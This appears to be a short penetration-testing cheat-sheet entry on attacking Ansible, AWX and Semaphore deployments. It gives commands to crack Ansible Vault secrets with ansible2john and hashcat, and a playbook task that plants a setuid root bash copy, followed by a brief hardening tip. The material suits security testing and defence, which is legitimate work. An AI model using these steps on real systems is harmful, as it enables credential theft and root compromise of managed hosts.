Ansible
aka awx, semaphore
Config-management/automation. Ansible Vault-encrypted strings crack offline (ansible2john), and because playbooks run against managed hosts (often as root), write access to a playbook is code execution on the fleet.
Ports
| Port | Proto | Notes |
|---|---|---|
80 | tcp | AWX / Semaphore web UI |
Fingerprint
- $ANSIBLE_VAULT;1.1;AES256 headers in vars/group_vars files
- playbooks (*.yml), inventory/hosts files, ansible.cfg on disk
Key files
| Path | Holds | Sensitive |
|---|---|---|
group_vars/all.yml | Vault-encrypted secrets, plaintext vars | sensitive |
ansible.cfg | vault_password_file path, remote_user, become settings | sensitive |
Exploitation primitives
- Crack Ansible Vault: `ansible2john` → hashcat mode 16900, then `ansible-vault decrypt`
- Writable playbook/role → add a task that runs your payload on the next run (often as root via `become`)
- AWX/Semaphore web: stored machine credentials + job templates → run arbitrary commands on managed hosts
Overview
Ansible pushes playbooks to managed hosts, usually escalating with become: true. Two wins: decrypting Vault secrets, and abusing the playbook run itself to execute on targets.
Crack an Ansible Vault
ansible2john vault.yml > vault.hashhashcat -m 16900 vault.hash /usr/share/wordlists/rockyou.txtDecrypt with the recovered password:
ansible-vault decrypt group_vars/all.ymlAbuse a writable playbook
Append a task that runs as the escalated user:
- hosts: all
become: true
tasks:
- shell: cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbashHardening
Store the vault password out of the repo, lock down write access to playbooks/roles, and least-privilege the become user.